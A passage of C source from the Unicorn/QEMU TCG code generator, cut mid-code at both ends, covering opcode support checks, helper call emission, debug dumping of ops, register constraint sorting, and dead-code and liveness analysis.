case INDEX_op_xor_i32: case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: return true; case INDEX_op_movcond_i32: return TCG_TARGET_HAS_movcond_i32; case INDEX_op_div_i32: case INDEX_op_divu_i32: return TCG_TARGET_HAS_div_i32; case INDEX_op_rem_i32: case INDEX_op_remu_i32: return TCG_TARGET_HAS_rem_i32; case INDEX_op_div2_i32: case INDEX_op_divu2_i32: return TCG_TARGET_HAS_div2_i32; case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: return TCG_TARGET_HAS_rot_i32; case INDEX_op_deposit_i32: return TCG_TARGET_HAS_deposit_i32; case INDEX_op_extract_i32: return TCG_TARGET_HAS_extract_i32; case INDEX_op_sextract_i32: return TCG_TARGET_HAS_sextract_i32; case INDEX_op_extract2_i32: return TCG_TARGET_HAS_extract2_i32; case INDEX_op_add2_i32: return TCG_TARGET_HAS_add2_i32; case INDEX_op_sub2_i32: return TCG_TARGET_HAS_sub2_i32; case INDEX_op_mulu2_i32: return TCG_TARGET_HAS_mulu2_i32; case INDEX_op_muls2_i32: return TCG_TARGET_HAS_muls2_i32; case INDEX_op_muluh_i32: return TCG_TARGET_HAS_muluh_i32; case INDEX_op_mulsh_i32: return TCG_TARGET_HAS_mulsh_i32; case INDEX_op_ext8s_i32: return TCG_TARGET_HAS_ext8s_i32; case INDEX_op_ext16s_i32: return TCG_TARGET_HAS_ext16s_i32; case INDEX_op_ext8u_i32: return TCG_TARGET_HAS_ext8u_i32; case INDEX_op_ext16u_i32: return TCG_TARGET_HAS_ext16u_i32; case INDEX_op_bswap16_i32: return TCG_TARGET_HAS_bswap16_i32; case INDEX_op_bswap32_i32: return TCG_TARGET_HAS_bswap32_i32; case INDEX_op_not_i32: return TCG_TARGET_HAS_not_i32; case INDEX_op_neg_i32: return TCG_TARGET_HAS_neg_i32; case 
INDEX_op_andc_i32: return TCG_TARGET_HAS_andc_i32; case INDEX_op_orc_i32: return TCG_TARGET_HAS_orc_i32; case INDEX_op_eqv_i32: return TCG_TARGET_HAS_eqv_i32; case INDEX_op_nand_i32: return TCG_TARGET_HAS_nand_i32; case INDEX_op_nor_i32: return TCG_TARGET_HAS_nor_i32; case INDEX_op_clz_i32: return TCG_TARGET_HAS_clz_i32; case INDEX_op_ctz_i32: return TCG_TARGET_HAS_ctz_i32; case INDEX_op_ctpop_i32: return TCG_TARGET_HAS_ctpop_i32; case INDEX_op_brcond2_i32: case INDEX_op_setcond2_i32: return TCG_TARGET_REG_BITS == 32; case INDEX_op_mov_i64: case INDEX_op_movi_i64: case INDEX_op_setcond_i64: case INDEX_op_brcond_i64: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: case INDEX_op_add_i64: case INDEX_op_sub_i64: case INDEX_op_mul_i64: case INDEX_op_and_i64: case INDEX_op_or_i64: case INDEX_op_xor_i64: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: return TCG_TARGET_REG_BITS == 64; case INDEX_op_movcond_i64: return TCG_TARGET_HAS_movcond_i64; case INDEX_op_div_i64: case INDEX_op_divu_i64: return TCG_TARGET_HAS_div_i64; case INDEX_op_rem_i64: case INDEX_op_remu_i64: return TCG_TARGET_HAS_rem_i64; case INDEX_op_div2_i64: case INDEX_op_divu2_i64: return TCG_TARGET_HAS_div2_i64; case INDEX_op_rotl_i64: case INDEX_op_rotr_i64: return TCG_TARGET_HAS_rot_i64; case INDEX_op_deposit_i64: return TCG_TARGET_HAS_deposit_i64; case INDEX_op_extract_i64: return TCG_TARGET_HAS_extract_i64; case INDEX_op_sextract_i64: return TCG_TARGET_HAS_sextract_i64; case INDEX_op_extract2_i64: return TCG_TARGET_HAS_extract2_i64; case INDEX_op_extrl_i64_i32: return TCG_TARGET_HAS_extrl_i64_i32; case INDEX_op_extrh_i64_i32: return TCG_TARGET_HAS_extrh_i64_i32; case INDEX_op_ext8s_i64: return TCG_TARGET_HAS_ext8s_i64; case INDEX_op_ext16s_i64: return TCG_TARGET_HAS_ext16s_i64; case INDEX_op_ext32s_i64: return TCG_TARGET_HAS_ext32s_i64; case INDEX_op_ext8u_i64: return TCG_TARGET_HAS_ext8u_i64; case INDEX_op_ext16u_i64: return TCG_TARGET_HAS_ext16u_i64; case INDEX_op_ext32u_i64: return TCG_TARGET_HAS_ext32u_i64; case INDEX_op_bswap16_i64: return TCG_TARGET_HAS_bswap16_i64; case INDEX_op_bswap32_i64: return TCG_TARGET_HAS_bswap32_i64; case INDEX_op_bswap64_i64: return TCG_TARGET_HAS_bswap64_i64; case INDEX_op_not_i64: return TCG_TARGET_HAS_not_i64; case INDEX_op_neg_i64: return TCG_TARGET_HAS_neg_i64; case INDEX_op_andc_i64: return TCG_TARGET_HAS_andc_i64; case INDEX_op_orc_i64: return TCG_TARGET_HAS_orc_i64; case INDEX_op_eqv_i64: return TCG_TARGET_HAS_eqv_i64; case INDEX_op_nand_i64: return TCG_TARGET_HAS_nand_i64; case INDEX_op_nor_i64: return TCG_TARGET_HAS_nor_i64; case INDEX_op_clz_i64: return TCG_TARGET_HAS_clz_i64; case INDEX_op_ctz_i64: return TCG_TARGET_HAS_ctz_i64; case INDEX_op_ctpop_i64: return TCG_TARGET_HAS_ctpop_i64; case INDEX_op_add2_i64: return TCG_TARGET_HAS_add2_i64; case INDEX_op_sub2_i64: return TCG_TARGET_HAS_sub2_i64; case INDEX_op_mulu2_i64: return TCG_TARGET_HAS_mulu2_i64; case INDEX_op_muls2_i64: return TCG_TARGET_HAS_muls2_i64; case INDEX_op_muluh_i64: return TCG_TARGET_HAS_muluh_i64; case INDEX_op_mulsh_i64: return TCG_TARGET_HAS_mulsh_i64; case INDEX_op_mov_vec: case INDEX_op_dup_vec: case INDEX_op_dupi_vec: case INDEX_op_dupm_vec: case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_add_vec: case 
INDEX_op_sub_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_cmp_vec: return have_vec; case INDEX_op_dup2_vec: return have_vec && TCG_TARGET_REG_BITS == 32; case INDEX_op_not_vec: return have_vec && TCG_TARGET_HAS_not_vec; case INDEX_op_neg_vec: return have_vec && TCG_TARGET_HAS_neg_vec; case INDEX_op_abs_vec: return have_vec && TCG_TARGET_HAS_abs_vec; case INDEX_op_andc_vec: return have_vec && TCG_TARGET_HAS_andc_vec; case INDEX_op_orc_vec: return have_vec && TCG_TARGET_HAS_orc_vec; case INDEX_op_mul_vec: return have_vec && TCG_TARGET_HAS_mul_vec; case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: return have_vec && TCG_TARGET_HAS_shi_vec; case INDEX_op_shls_vec: case INDEX_op_shrs_vec: case INDEX_op_sars_vec: return have_vec && TCG_TARGET_HAS_shs_vec; case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: return have_vec && TCG_TARGET_HAS_shv_vec; case INDEX_op_ssadd_vec: case INDEX_op_usadd_vec: case INDEX_op_sssub_vec: case INDEX_op_ussub_vec: return have_vec && TCG_TARGET_HAS_sat_vec; case INDEX_op_smin_vec: case INDEX_op_umin_vec: case INDEX_op_smax_vec: case INDEX_op_umax_vec: return have_vec && TCG_TARGET_HAS_minmax_vec; case INDEX_op_bitsel_vec: return have_vec && TCG_TARGET_HAS_bitsel_vec; case INDEX_op_cmpsel_vec: return have_vec && TCG_TARGET_HAS_cmpsel_vec; default: tcg_debug_assert(op > INDEX_op_last_generic && op < NB_OPS); return true; } } /* Note: we convert the 64-bit args to 32-bit and do some alignment and endian swapping. Maybe it would be better to do the alignment and endian swap in tcg_reg_alloc_call(). */ void tcg_gen_callN(TCGContext *tcg_ctx, void *func, TCGTemp *ret, int nargs, TCGTemp **args) { int i, real_args, nb_rets, pi; unsigned sizemask, flags; TCGHelperInfo *info; TCGOp *op; info = g_hash_table_lookup(tcg_ctx->helper_table, (gpointer)func); flags = info->flags; sizemask = info->sizemask; #if defined(__sparc__) && !defined(__arch64__) /* We have 64-bit values in one register, but need to pass them as two separate parameters. Split them. */ int orig_sizemask = sizemask; int orig_nargs = nargs; TCGv_i64 retl, reth; TCGTemp *split_args[MAX_OPC_PARAM]; retl = NULL; reth = NULL; if (sizemask != 0) { for (i = real_args = 0; i < nargs; ++i) { int is_64bit = sizemask & (1 << (i+1)*2); if (is_64bit) { TCGv_i64 orig = temp_tcgv_i64(tcg_ctx, args[i]); TCGv_i32 h = tcg_temp_new_i32(tcg_ctx); TCGv_i32 l = tcg_temp_new_i32(tcg_ctx); tcg_gen_extr_i64_i32(tcg_ctx, l, h, orig); split_args[real_args++] = tcgv_i32_temp(tcg_ctx, h); split_args[real_args++] = tcgv_i32_temp(tcg_ctx, l); } else { split_args[real_args++] = args[i]; } } nargs = real_args; args = split_args; sizemask = 0; } #elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 for (i = 0; i < nargs; ++i) { int is_64bit = sizemask & (1 << (i+1)*2); int is_signed = sizemask & (2 << (i+1)*2); if (!is_64bit) { TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 orig = temp_tcgv_i64(tcg_ctx, args[i]); if (is_signed) { tcg_gen_ext32s_i64(tcg_ctx, temp, orig); } else { tcg_gen_ext32u_i64(tcg_ctx, temp, orig); } args[i] = tcgv_i64_temp(tcg_ctx, temp); } } #endif /* TCG_TARGET_EXTEND_ARGS */ op = tcg_emit_op(tcg_ctx, INDEX_op_call); pi = 0; if (ret != NULL) { #if defined(__sparc__) && !defined(__arch64__) if (orig_sizemask & 1) { /* The 32-bit ABI is going to return the 64-bit value in the %o0/%o1 register pair. Prepare for this by using two return temporaries, and reassemble below.
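(Illustrative: once the call returns, reth/retl hold %o0/%o1, and the tcg_gen_concat32_i64() further down re-assembles them into the caller's 64-bit return temp.)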
*/ retl = tcg_temp_new_i64(tcg_ctx); reth = tcg_temp_new_i64(tcg_ctx); op->args[pi++] = tcgv_i64_arg(tcg_ctx, reth); op->args[pi++] = tcgv_i64_arg(tcg_ctx, retl); nb_rets = 2; } else { op->args[pi++] = temp_arg(ret); nb_rets = 1; } #else if (TCG_TARGET_REG_BITS < 64 && (sizemask & 1)) { #ifdef HOST_WORDS_BIGENDIAN op->args[pi++] = temp_arg(ret + 1); op->args[pi++] = temp_arg(ret); #else op->args[pi++] = temp_arg(ret); op->args[pi++] = temp_arg(ret + 1); #endif nb_rets = 2; } else { op->args[pi++] = temp_arg(ret); nb_rets = 1; } #endif } else { nb_rets = 0; } TCGOP_CALLO(op) = nb_rets; real_args = 0; for (i = 0; i < nargs; i++) { int is_64bit = sizemask & (1 << (i+1)*2); if (TCG_TARGET_REG_BITS < 64 && is_64bit) { #ifdef TCG_TARGET_CALL_ALIGN_ARGS /* some targets want aligned 64 bit args */ if (real_args & 1) { op->args[pi++] = TCG_CALL_DUMMY_ARG; real_args++; } #endif /* If the stack grows up, then we will be placing successive arguments at lower addresses, which means we need to reverse the order compared to how we would normally treat either big or little-endian. For those arguments that will wind up in registers, this still works for HPPA (the only current STACK_GROWSUP target) since the argument registers are *also* allocated in decreasing order. If another such target is added, this logic may have to get more complicated to differentiate between stack arguments and register arguments. */ #if defined(HOST_WORDS_BIGENDIAN) != defined(TCG_TARGET_STACK_GROWSUP) op->args[pi++] = temp_arg(args[i] + 1); op->args[pi++] = temp_arg(args[i]); #else op->args[pi++] = temp_arg(args[i]); op->args[pi++] = temp_arg(args[i] + 1); #endif real_args += 2; continue; } op->args[pi++] = temp_arg(args[i]); real_args++; } op->args[pi++] = (uintptr_t)func; op->args[pi++] = flags; TCGOP_CALLI(op) = real_args; /* Make sure the fields didn't overflow. */ tcg_debug_assert(TCGOP_CALLI(op) == real_args); tcg_debug_assert(pi <= ARRAY_SIZE(op->args)); #if defined(__sparc__) && !defined(__arch64__) /* Free all of the parts we allocated above. */ for (i = real_args = 0; i < orig_nargs; ++i) { int is_64bit = orig_sizemask & (1 << (i+1)*2); if (is_64bit) { tcg_temp_free_internal(tcg_ctx, args[real_args++]); tcg_temp_free_internal(tcg_ctx, args[real_args++]); } else { real_args++; } } if (orig_sizemask & 1) { /* The 32-bit ABI returned two 32-bit pieces. Re-assemble them. Note that describing these as TCGv_i64 eliminates an unnecessary zero-extension that tcg_gen_concat_i32_i64 would create. */ tcg_gen_concat32_i64(tcg_ctx, temp_tcgv_i64(tcg_ctx, ret), retl, reth); tcg_temp_free_i64(tcg_ctx, retl); tcg_temp_free_i64(tcg_ctx, reth); } #elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 for (i = 0; i < nargs; ++i) { int is_64bit = sizemask & (1 << (i+1)*2); if (!is_64bit) { tcg_temp_free_internal(tcg_ctx, args[i]); } } #endif /* TCG_TARGET_EXTEND_ARGS */ } static void tcg_reg_alloc_start(TCGContext *s) { int i, n; TCGTemp *ts; for (i = 0, n = s->nb_globals; i < n; i++) { ts = &s->temps[i]; ts->val_type = (ts->fixed_reg ? TEMP_VAL_REG : TEMP_VAL_MEM); } for (n = s->nb_temps; i < n; i++) { ts = &s->temps[i]; ts->val_type = (ts->temp_local ? TEMP_VAL_MEM : TEMP_VAL_DEAD); ts->mem_allocated = 0; ts->fixed_reg = 0; } memset(s->reg_to_temp, 0, sizeof(s->reg_to_temp)); } /* Find helper name.
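Helpers are registered once per context by inserting their TCGHelperInfo into s->helper_table keyed on the function pointer; a minimal sketch (not the verbatim registration code) would be: g_hash_table_insert(s->helper_table, (gpointer)func, (gpointer)info); The reverse lookup below is only used to pretty-print call ops, so a NULL result simply means "no name".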
*/ static inline const char *tcg_find_helper(TCGContext *s, uintptr_t val) { const char *ret = NULL; if (s->helper_table) { TCGHelperInfo *info = g_hash_table_lookup(s->helper_table, (gpointer)val); if (info) { ret = info->name; } } return ret; } static char *tcg_get_arg_str_ptr(TCGContext *s, char *buf, int buf_size, TCGTemp *ts) { int idx = temp_idx(s, ts); if (ts->temp_global) { pstrcpy(buf, buf_size, ts->name); } else if (ts->temp_local) { snprintf(buf, buf_size, "loc%d", idx - s->nb_globals); } else { snprintf(buf, buf_size, "tmp%d", idx - s->nb_globals); } return buf; } static char *tcg_get_arg_str(TCGContext *s, char *buf, int buf_size, TCGArg arg) { return tcg_get_arg_str_ptr(s, buf, buf_size, arg_temp(arg)); } static const char * const cond_name[] = { [TCG_COND_NEVER] = "never", [TCG_COND_ALWAYS] = "always", [TCG_COND_EQ] = "eq", [TCG_COND_NE] = "ne", [TCG_COND_LT] = "lt", [TCG_COND_GE] = "ge", [TCG_COND_LE] = "le", [TCG_COND_GT] = "gt", [TCG_COND_LTU] = "ltu", [TCG_COND_GEU] = "geu", [TCG_COND_LEU] = "leu", [TCG_COND_GTU] = "gtu" }; static const char * const ldst_name[] = { [MO_UB] = "ub", [MO_SB] = "sb", [MO_LEUW] = "leuw", [MO_LESW] = "lesw", [MO_LEUL] = "leul", [MO_LESL] = "lesl", [MO_LEQ] = "leq", [MO_BEUW] = "beuw", [MO_BESW] = "besw", [MO_BEUL] = "beul", [MO_BESL] = "besl", [MO_BEQ] = "beq", }; static const char * const alignment_name[(MO_AMASK >> MO_ASHIFT) + 1] = { #ifdef TARGET_ALIGNED_ONLY [MO_UNALN >> MO_ASHIFT] = "un+", [MO_ALIGN >> MO_ASHIFT] = "", #else [MO_UNALN >> MO_ASHIFT] = "", [MO_ALIGN >> MO_ASHIFT] = "al+", #endif [MO_ALIGN_2 >> MO_ASHIFT] = "al2+", [MO_ALIGN_4 >> MO_ASHIFT] = "al4+", [MO_ALIGN_8 >> MO_ASHIFT] = "al8+", [MO_ALIGN_16 >> MO_ASHIFT] = "al16+", [MO_ALIGN_32 >> MO_ASHIFT] = "al32+", [MO_ALIGN_64 >> MO_ASHIFT] = "al64+", }; /* * Unicorn: Utility to dump a single op. 
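 * Intended for interactive debugging; e.g. a hypothetical gdb session:
 *     (gdb) call tcg_dump_op(tcg_ctx, false, op)
 * prints a single line such as "add_i32 tmp3,tmp1,tmp2" to stderr.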
*/ void tcg_dump_op(TCGContext *s, bool have_prefs, TCGOp* op) { char buf[128]; int i, k, nb_oargs, nb_iargs, nb_cargs; const TCGOpDef *def; TCGOpcode c; c = op->opc; def = &s->tcg_op_defs[c]; if (c == INDEX_op_insn_start) { nb_oargs = 0; fprintf(stderr, " ----"); for (i = 0; i < TARGET_INSN_START_WORDS; ++i) { target_ulong a; #if TARGET_LONG_BITS > TCG_TARGET_REG_BITS a = deposit64(op->args[i * 2], 32, 32, op->args[i * 2 + 1]); #else a = op->args[i]; #endif fprintf(stderr, " " TARGET_FMT_lx, a); } } else if (c == INDEX_op_call) { /* variable number of arguments */ nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); nb_cargs = def->nb_cargs; /* function name, flags, out args */ fprintf(stderr, " %s %s,$0x%" TCG_PRIlx ",$%d", def->name, tcg_find_helper(s, op->args[nb_oargs + nb_iargs]), op->args[nb_oargs + nb_iargs + 1], nb_oargs); for (i = 0; i < nb_oargs; i++) { fprintf(stderr, ",%s", tcg_get_arg_str(s, buf, sizeof(buf), op->args[i])); } for (i = 0; i < nb_iargs; i++) { TCGArg arg = op->args[nb_oargs + i]; const char *t = "<dummy>"; if (arg != TCG_CALL_DUMMY_ARG) { t = tcg_get_arg_str(s, buf, sizeof(buf), arg); } fprintf(stderr, ",%s", t); } } else { fprintf(stderr, " %s ", def->name); nb_oargs = def->nb_oargs; nb_iargs = def->nb_iargs; nb_cargs = def->nb_cargs; if (def->flags & TCG_OPF_VECTOR) { fprintf(stderr, "v%d,e%d,", 64 << TCGOP_VECL(op), 8 << TCGOP_VECE(op)); } k = 0; for (i = 0; i < nb_oargs; i++) { if (k != 0) { fprintf(stderr, ","); } fprintf(stderr, "%s", tcg_get_arg_str(s, buf, sizeof(buf), op->args[k++])); } for (i = 0; i < nb_iargs; i++) { if (k != 0) { fprintf(stderr, ","); } fprintf(stderr, "%s", tcg_get_arg_str(s, buf, sizeof(buf), op->args[k++])); } switch (c) { case INDEX_op_brcond_i32: case INDEX_op_setcond_i32: case INDEX_op_movcond_i32: case INDEX_op_brcond2_i32: case INDEX_op_setcond2_i32: case INDEX_op_brcond_i64: case INDEX_op_setcond_i64: case INDEX_op_movcond_i64: case INDEX_op_cmp_vec: case INDEX_op_cmpsel_vec: if (op->args[k] < ARRAY_SIZE(cond_name) && cond_name[op->args[k]]) { fprintf(stderr, ",%s", cond_name[op->args[k++]]); } else { fprintf(stderr, ",$0x%" TCG_PRIlx, op->args[k++]); } i = 1; break; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_st_i32: case INDEX_op_qemu_ld_i64: case INDEX_op_qemu_st_i64: { TCGMemOpIdx oi = op->args[k++]; MemOp op = get_memop(oi); unsigned ix = get_mmuidx(oi); if (op & ~(MO_AMASK | MO_BSWAP | MO_SSIZE)) { fprintf(stderr, ",$0x%x,%u", op, ix); } else { const char *s_al, *s_op; s_al = alignment_name[(op & MO_AMASK) >> MO_ASHIFT]; s_op = ldst_name[op & (MO_BSWAP | MO_SSIZE)]; fprintf(stderr, ",%s%s,%u", s_al, s_op, ix); } i = 1; } break; default: i = 0; break; } switch (c) { case INDEX_op_set_label: case INDEX_op_br: case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: case INDEX_op_brcond2_i32: fprintf(stderr, "%s$L%d", k ? "," : "", arg_label(op->args[k])->id); i++, k++; break; default: break; } for (; i < nb_cargs; i++, k++) { fprintf(stderr, "%s$0x%" TCG_PRIlx, k ? 
"," : "", op->args[k]); } if(c == INDEX_op_mov_i64){ struct TCGTemp* tp = arg_temp(op->args[1]); if (tp && tp->val_type == TEMP_VAL_MEM){ fprintf(stderr, " mem_base=%p ", tp->mem_base); } } } if (op->life) { unsigned life = op->life; if (life & (SYNC_ARG * 3)) { fprintf(stderr, " sync:"); for (i = 0; i < 2; ++i) { if (life & (SYNC_ARG << i)) { fprintf(stderr, " %d", i); } } } life /= DEAD_ARG; if (life) { fprintf(stderr, " dead:"); for (i = 0; life; ++i, life >>= 1) { if (life & 1) { fprintf(stderr, " %d", i); } } } } if (have_prefs) { for (i = 0; i < nb_oargs; ++i) { TCGRegSet set = op->output_pref[i]; if (i == 0) { fprintf(stderr, " pref="); } else { fprintf(stderr, ","); } if (set == 0) { fprintf(stderr, "none"); } else if (set == MAKE_64BIT_MASK(0, TCG_TARGET_NB_REGS)) { fprintf(stderr, "all"); #ifdef CONFIG_DEBUG_TCG } else if (tcg_regset_single(set)) { TCGReg reg = tcg_regset_first(set); fprintf(stderr, "%s", tcg_target_reg_names[reg]); #endif } else if (TCG_TARGET_NB_REGS <= 32) { fprintf(stderr, "%#x", (uint32_t)set); } else { fprintf(stderr, "%#" PRIx64, (uint64_t)set); } } } fprintf(stderr, "\n"); } #if 0 static gboolean tcg_dump_tb(gpointer key, gpointer value, gpointer data) { TranslationBlock* tb = (TranslationBlock*)value; fprintf(stderr, " TB "TARGET_FMT_lx"->"TARGET_FMT_lx", flag=%x, cflag=%x\n", tb->pc, tb->pc + tb->size, tb->flags, tb->cflags); return false; } #endif #if 0 /* * Utility to iterate tbs for a TCGContext*. */ static void tcg_dump_tbs(TCGContext *s) { fprintf(stderr, " TBs:\n"); tcg_tb_foreach(s, tcg_dump_tb, NULL); fprintf(stderr, "\n"); return; } #endif void tcg_dump_ops(TCGContext *s, bool have_prefs, const char *headline) { TCGOp *op; int insn_idx = 0; int op_idx = 0; fprintf(stderr, "\n*** %s\n", headline); // tcg_dump_tbs(s, tcg_dump_tb, NULL); QTAILQ_FOREACH(op, &s->ops, link) { if (op->opc == INDEX_op_insn_start) { fprintf(stderr, "\n insn_idx=%d", insn_idx); insn_idx++; op_idx = 0; } else { fprintf(stderr, " %d: ", op_idx); } op_idx++; tcg_dump_op(s, have_prefs, op); } } static inline bool tcg_regset_single(TCGRegSet d) { return (d & (d - 1)) == 0; } static inline TCGReg tcg_regset_first(TCGRegSet d) { if (TCG_TARGET_NB_REGS <= 32) { return ctz32(d); } else { return ctz64(d); } } /* we give more priority to constraints with less registers */ static int get_constraint_priority(const TCGOpDef *def, int k) { const TCGArgConstraint *arg_ct; int i, n; arg_ct = &def->args_ct[k]; if (arg_ct->ct & TCG_CT_ALIAS) { /* an alias is equivalent to a single register */ n = 1; } else { if (!(arg_ct->ct & TCG_CT_REG)) return 0; n = 0; for(i = 0; i < TCG_TARGET_NB_REGS; i++) { if (tcg_regset_test_reg(arg_ct->u.regs, i)) n++; } } return TCG_TARGET_NB_REGS - n + 1; } /* sort from highest priority to lowest */ static void sort_constraints(TCGOpDef *def, int start, int n) { int i, j, p1, p2, tmp; for(i = 0; i < n; i++) def->sorted_args[start + i] = start + i; if (n <= 1) return; for(i = 0; i < n - 1; i++) { for(j = i + 1; j < n; j++) { p1 = get_constraint_priority(def, def->sorted_args[start + i]); p2 = get_constraint_priority(def, def->sorted_args[start + j]); if (p1 < p2) { tmp = def->sorted_args[start + i]; def->sorted_args[start + i] = def->sorted_args[start + j]; def->sorted_args[start + j] = tmp; } } } } static void process_op_defs(TCGContext *s) { TCGOpcode op; for (op = 0; op < NB_OPS; op++) { TCGOpDef *def = &s->tcg_op_defs[op]; const TCGTargetOpDef *tdefs; TCGType type; int i, nb_args; if (def->flags & TCG_OPF_NOT_PRESENT) { continue; } nb_args = def->nb_iargs + 
def->nb_oargs; if (nb_args == 0) { continue; } tdefs = tcg_target_op_def(op); /* Missing TCGTargetOpDef entry. */ tcg_debug_assert(tdefs != NULL); type = (def->flags & TCG_OPF_64BIT ? TCG_TYPE_I64 : TCG_TYPE_I32); for (i = 0; i < nb_args; i++) { const char *ct_str = tdefs->args_ct_str[i]; /* Incomplete TCGTargetOpDef entry. */ tcg_debug_assert(ct_str != NULL); def->args_ct[i].u.regs = 0; def->args_ct[i].ct = 0; while (*ct_str != '\0') { switch (*ct_str) { case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': { int oarg = *ct_str - '0'; tcg_debug_assert(ct_str == tdefs->args_ct_str[i]); tcg_debug_assert(oarg < def->nb_oargs); tcg_debug_assert(def->args_ct[oarg].ct & TCG_CT_REG); /* TCG_CT_ALIAS is for the output arguments. The input is tagged with TCG_CT_IALIAS. */ def->args_ct[i] = def->args_ct[oarg]; def->args_ct[oarg].ct |= TCG_CT_ALIAS; def->args_ct[oarg].alias_index = i; def->args_ct[i].ct |= TCG_CT_IALIAS; def->args_ct[i].alias_index = oarg; } ct_str++; break; case '&': def->args_ct[i].ct |= TCG_CT_NEWREG; ct_str++; break; case 'i': def->args_ct[i].ct |= TCG_CT_CONST; ct_str++; break; default: ct_str = target_parse_constraint(&def->args_ct[i], ct_str, type); /* Typo in TCGTargetOpDef constraint. */ tcg_debug_assert(ct_str != NULL); } } } /* TCGTargetOpDef entry with too much information? */ tcg_debug_assert(i == TCG_MAX_OP_ARGS || tdefs->args_ct_str[i] == NULL); /* sort the constraints (XXX: this is just a heuristic) */ sort_constraints(def, 0, def->nb_oargs); sort_constraints(def, def->nb_oargs, def->nb_iargs); } } void tcg_op_remove(TCGContext *s, TCGOp *op) { TCGLabel *label; switch (op->opc) { case INDEX_op_br: label = arg_label(op->args[0]); label->refs--; break; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: label = arg_label(op->args[3]); label->refs--; break; case INDEX_op_brcond2_i32: label = arg_label(op->args[5]); label->refs--; break; default: break; } QTAILQ_REMOVE(&s->ops, op, link); QTAILQ_INSERT_TAIL(&s->free_ops, op, link); s->nb_ops--; } static TCGOp *tcg_op_alloc(TCGContext *s, TCGOpcode opc) { TCGOp *op; if (likely(QTAILQ_EMPTY(&s->free_ops))) { op = tcg_malloc(s, sizeof(TCGOp)); } else { op = QTAILQ_FIRST(&s->free_ops); QTAILQ_REMOVE(&s->free_ops, op, link); } memset(op, 0, offsetof(TCGOp, link)); op->opc = opc; s->nb_ops++; return op; } TCGOp *tcg_emit_op(TCGContext *tcg_ctx, TCGOpcode opc) { TCGOp *op = tcg_op_alloc(tcg_ctx, opc); QTAILQ_INSERT_TAIL(&tcg_ctx->ops, op, link); return op; } TCGOp *tcg_op_insert_before(TCGContext *s, TCGOp *old_op, TCGOpcode opc) { TCGOp *new_op = tcg_op_alloc(s, opc); QTAILQ_INSERT_BEFORE(old_op, new_op, link); return new_op; } TCGOp *tcg_op_insert_after(TCGContext *s, TCGOp *old_op, TCGOpcode opc) { TCGOp *new_op = tcg_op_alloc(s, opc); QTAILQ_INSERT_AFTER(&s->ops, old_op, new_op, link); return new_op; } /* Reachable analysis: remove unreachable code. */ static void reachable_code_pass(TCGContext *s) { TCGOp *op, *op_next; bool dead = false; QTAILQ_FOREACH_SAFE(op, &s->ops, link, op_next) { bool remove = dead; TCGLabel *label; int call_flags; switch (op->opc) { case INDEX_op_set_label: label = arg_label(op->args[0]); if (label->refs == 0) { /* * While there is an occasional backward branch, virtually * all branches generated by the translators are forward. * Which means that generally we will have already removed * all references to the label by the time we reach it, and * there is little to be gained by iterating. */ remove = true; } else { /* Once we see a label, insns become live again.
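For instance (illustrative TCG listing), in
       br $L1
       mov_i32 tmp0, tmp1      <- unreachable, removed
   set_label $L1
   the mov is dropped, and if $L1 is then left with only the single reference from that br, the br/set_label pair is removed as well.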
*/ dead = false; remove = false; /* * Optimization can fold conditional branches to unconditional. * If we find a label with one reference which is preceded by * an unconditional branch to it, remove both. This needed to * wait until the dead code in between them was removed. */ if (label->refs == 1) { TCGOp *op_prev = QTAILQ_PREV(op, link); if (op_prev->opc == INDEX_op_br && label == arg_label(op_prev->args[0])) { tcg_op_remove(s, op_prev); remove = true; } } } break; case INDEX_op_br: case INDEX_op_exit_tb: case INDEX_op_goto_ptr: /* Unconditional branches; everything following is dead. */ dead = true; break; case INDEX_op_call: /* Notice noreturn helper calls, raising exceptions. */ call_flags = op->args[TCGOP_CALLO(op) + TCGOP_CALLI(op) + 1]; if (call_flags & TCG_CALL_NO_RETURN) { dead = true; } break; case INDEX_op_insn_start: /* Never remove -- we need to keep these for unwind. */ remove = false; break; default: break; } if (remove) { tcg_op_remove(s, op); } } } #define TS_DEAD 1 #define TS_MEM 2 #define IS_DEAD_ARG(n) (arg_life & (DEAD_ARG << (n))) #define NEED_SYNC_ARG(n) (arg_life & (SYNC_ARG << (n))) /* For liveness_pass_1, the register preferences for a given temp. */ static inline TCGRegSet *la_temp_pref(TCGTemp *ts) { return ts->state_ptr; } /* For liveness_pass_1, reset the preferences for a given temp to the * maximal regset for its type. */ static inline void la_reset_pref(TCGContext *tcg_ctx, TCGTemp *ts) { *la_temp_pref(ts) = (ts->state == TS_DEAD ? 0 : tcg_ctx->tcg_target_available_regs[ts->type]); } /* Unicorn: for brcond, we should refresh liveness states for TCG globals */ static void la_brcond_end(TCGContext *s, int ng) { int i; for (i = 0; i < ng; i++) { s->temps[i].state |= TS_MEM; } } /* liveness analysis: end of function: all temps are dead, and globals should be in memory. */ static void la_func_end(TCGContext *s, int ng, int nt) { int i; for (i = 0; i < ng; ++i) { s->temps[i].state = TS_DEAD | TS_MEM; la_reset_pref(s, &s->temps[i]); } for (i = ng; i < nt; ++i) { s->temps[i].state = TS_DEAD; la_reset_pref(s, &s->temps[i]); } } /* liveness analysis: end of basic block: all temps are dead, globals and local temps should be in memory. */ static void la_bb_end(TCGContext *s, int ng, int nt) 